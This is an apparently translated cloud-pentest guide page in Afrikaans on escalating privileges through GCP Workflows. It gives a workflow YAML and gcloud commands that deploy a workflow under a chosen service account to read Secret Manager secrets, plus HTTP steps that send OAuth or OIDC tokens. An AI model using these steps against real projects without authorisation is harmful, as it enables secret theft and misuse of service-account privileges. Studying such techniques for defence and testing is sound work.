GCP - Workflows Privesc

Workflows

Basiese Inligting:

workflows.workflows.create, iam.serviceAccounts.ActAs, workflows.executions.create, (workflows.workflows.get, workflows.operations.get)

Soos ek weet, is dit nie moontlik om 'n shell te kry met toegang tot die metadata-eindpunt wat die SA-akkrediteer van die SA wat aan 'n Workflow aangeheg is, bevat nie. Dit is egter moontlik om die toestemmings van die SA te misbruik deur die aksies wat binne die Workflow uitgevoer moet word, by te voeg.

Dit is moontlik om die dokumentasie van die connectors te vind. Byvoorbeeld, dit is die bladsy van die Secretmanager connector. In die sybalk is dit moontlik om verskeie ander connectors te vind.

En hier kan jy 'n voorbeeld van 'n connector vind wat 'n geheim druk:

main:
params: [input]
steps:
- access_string_secret:
call: googleapis.secretmanager.v1.projects.secrets.versions.accessString
args:
secret_id: secret_name
version: 1
project_id: project-id
result: str_secret
- returnOutput:
return: '${str_secret}'

Opdateer vanaf die CLI:

gcloud workflows deploy <workflow-name> \
--service-account=email@SA \
--source=/path/to/config.yaml \
--location us-central1

As jy 'n fout soos ERROR: (gcloud.workflows.deploy) FAILED_PRECONDITION: Workflows service agent does not exist kry, wag net 'n minuut en probeer weer.

As jy nie webtoegang het nie, is dit moontlik om 'n Workflow te aktiveer en die uitvoering te sien met:

# Run execution with output
gcloud workflows run <workflow-name> --location us-central1

# Run execution without output
gcloud workflows execute <workflow-name> --location us-central1

# List executions
gcloud workflows executions list <workflow-name>

# Get execution info and output
gcloud workflows executions describe projects/<proj-number>/locations/<location>/workflows/<workflow-name>/executions/<execution-id>

Let daarop dat selfs al kry jy 'n fout soos PERMISSION_DENIED: Permission 'workflows.operations.get' denied on... omdat jy nie daardie toestemming het nie, is die werksvloei gegenereer.

Lek OIDC-token (en OAuth?)

Volgens die dokumentasie is dit moontlik om werksvloei-stappe te gebruik wat 'n HTTP-versoek sal stuur met die OAuth of OIDC-token. Maar, net soos in die geval van Cloud Scheduler, moet die HTTP-versoek met die Oauth-token na die gasheer .googleapis.com wees.

Oauth

- step_A:
call: http.post
args:
url: https://compute.googleapis.com/compute/v1/projects/myproject1234/zones/us-central1-b/instances/myvm001/stop
auth:
type: OAuth2
scopes: OAUTH_SCOPE

OIDC

- step_A:
call: http.get
args:
url: https://us-central1-project.cloudfunctions.net/functionA
query:
firstNumber: 4
secondNumber: 6
operation: sum
auth:
type: OIDC
audience: OIDC_AUDIENCE

workflows.workflows.update ...

Met hierdie toestemming in plaas van workflows.workflows.create is dit moontlik om 'n reeds bestaande workflow op te dateer en dieselfde aanvalle uit te voer.